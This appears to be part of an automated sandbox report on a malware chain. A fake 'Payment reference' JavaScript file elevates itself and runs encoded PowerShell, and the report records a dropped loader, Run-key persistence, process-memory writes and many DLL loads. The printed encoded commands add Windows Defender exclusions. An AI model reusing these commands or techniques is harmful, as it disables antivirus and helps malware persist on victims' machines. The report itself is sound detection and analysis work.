Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??????????.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ???.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ???.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ???.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ????.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: tquery.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: cryptdll.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: spp.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: vssapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: vsstrace.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: sppwmi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: sppcext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: winscard.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: sti.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: url.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: chrome.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: tquery.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: cryptdll.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: spp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: vssapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: vsstrace.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: sppwmi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: sppcext.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: winscard.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\SysWOW64\colorcpl.exe Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\colorcpl.exe Window detected: Number of UI elements: 12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: easinvoker.pdb source: loader.exe, 0000000E.00000002.1106214675.0000000020D18000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1029107436.000000007F980000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007ECA3000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007EC90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: loader.exe, 0000000E.00000003.1037350319.000000000074C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 0000000E.00000002.1106214675.0000000020D18000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1029107436.000000007F980000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007ECA3000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1037350319.000000000077B000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007EC90000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.exe%22 a1:%22%22C%3A%5CUsers%5Cuser%5CDesktop%5CPayment%20reference%20no.%20-%20FT910298955674.js%22%20%2Felevate%22 a2:%22%22 a3:%22runas%22 a4:1");IShellDispatch6.ShellExecute("C:\Windows\System32\WScript.exe", ""C:\Users\user\Desktop\Payment ref", "", "runas", "1")
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: CreateTextFile("Z:\syscalls\659.js.csv");ITextStream.WriteLine(" entry:26 f:EnsureElevatedPrivileges");ITextStream.WriteLine(" exec:29 f:EnsureElevatedPrivileges");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:34 o: f:Exists a0:%22elevate%22");IWSHNamedArguments.Exists("elevate");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:34 o: f:Exists r:true");ITextStream.WriteLine(" exit:26 f:EnsureElevatedPrivileges r:undefined");IWshShell3._00000000();ITextStream.WriteLine(" entry:134 o: f:run a0:%22powershell%20-enc%20cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA%22 a1:0 a2");IWshShell3.Run("powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbg", "0", "false");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\659.js.csv");ITextStream.WriteLine(" entry:26 f:EnsureElevatedPrivileges");ITextStream.WriteLine(" exec:29 f:EnsureElevatedPrivileges");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:34 o: f:Exists a0:%22elevate%22");IWSHNamedArguments.Exists("elevate");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:34 o: f:Exists r:true");ITextStream.WriteLine(" exit:26 f:EnsureElevatedPrivileges r:undefined");IWshShell3._00000000();ITextStream.WriteLine(" entry:134 o: f:run a0:%22powershell%20-enc%20cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA%22 a1:0 a2");IWshShell3.Run("powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbg", "0", "false");IWshShell3._00000000();ITextStream.WriteLine(" exit:134 o: f:run r:0");IWshShell3._00000000();ITextStream.WriteLine(" entry:151 o: f:run a0:%22powershell%20-enc%20cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwB");IWshShell3.Run("powershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQ", "0", "false");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\659.js.csv");ITextStream.WriteLine(" entry:26 f:EnsureElevatedPrivileges");ITextStream.WriteLine(" exec:29 f:EnsureElevatedPrivileges");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:34 o: f:Exists a0:%22elevate%22");IWSHNamedArguments.Exists("elevate");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:34 o: f:Exists r:true");ITextStream.WriteLine(" exit:26 f:EnsureElevatedPrivileges r:undefined");IWshShell3._00000000();ITextStream.WriteLine(" entry:134 o: f:run a0:%22powershell%20-enc%20cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHU
Source: Yara match File source: 14.2.loader.exe.2370c78.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.loader.exe.2ff0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.loader.exe.2370c78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.1141302711.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1072315069.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03003FB4 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary, 14_2_03003FB4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB9AB02658 push cs; iretd 5_2_00007FFB9AB026A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB9AB028C5 pushad ; iretd 5_2_00007FFB9AB028CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFB9AAF09E8 push E85DD45Dh; ret 7_2_00007FFB9AAF09F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFB9AB02B1D pushfd ; iretd 9_2_00007FFB9AB02B32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFB9AB026C3 push ss; iretd 9_2_00007FFB9AB026D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFB9AB027CB push ebx; iretd 9_2_00007FFB9AB0280A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFB9AB02603 push cs; iretd 9_2_00007FFB9AB02642
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB9A9DD2A5 pushad ; iretd 11_2_00007FFB9A9DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB9ABC2316 push 8B485F94h; iretd 11_2_00007FFB9ABC231B
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030053B4 push 030053ECh; ret 14_2_030053E4
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF3210 push eax; ret 14_2_02FF324C
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFC3B2 push 02FFC80Ah; ret 14_2_02FFC802
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF6368 push 02FF63AAh; ret 14_2_02FF63A2
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF6366 push 02FF63AAh; ret 14_2_02FF63A2
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030162AC push 03016317h; ret 14_2_0301630F
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03004118 push 03004150h; ret 14_2_03004148
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03016144 push 030161ECh; ret 14_2_030161E4
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030161F8 push 03016288h; ret 14_2_03016280
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFC004 push ecx; mov dword ptr [esp], edx 14_2_02FFC009
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030160AC push 03016125h; ret 14_2_0301611D
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030030C6 push 03003173h; ret 14_2_0300316B
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030030C8 push 03003173h; ret 14_2_0300316B
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFF6E0 push 02FFF756h; ret 14_2_02FFF74E
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFC684 push 02FFC80Ah; ret 14_2_02FFC802
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFF7EC push 02FFF839h; ret 14_2_02FFF831
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFF7EB push 02FFF839h; ret 14_2_02FFF831
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_030025FC push ecx; mov dword ptr [esp], edx 14_2_030025FE
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300749B push 030074D4h; ret 14_2_030074CC
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300749C push 030074D4h; ret 14_2_030074CC
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300AA18 push ecx; mov dword ptr [esp], edx 14_2_0300AA1D
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03015A78 push 03015C5Eh; ret 14_2_03015C56

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\loader.exe File created: C:\Users\user\Links\Xdnxwtne.PIF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004062E2 ShellExecuteW,URLDownloadToFileW, 20_2_004062E2
Source: C:\Users\user\AppData\Local\Temp\loader.exe File created: C:\Users\user\Links\Xdnxwtne.PIF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\loader.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 20_2_0041AC43
Source: C:\Users\user\AppData\Local\Temp\loader.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Xdnxwtne
Source: C:\Users\user\AppData\Local\Temp\loader.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Xdnxwtne

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
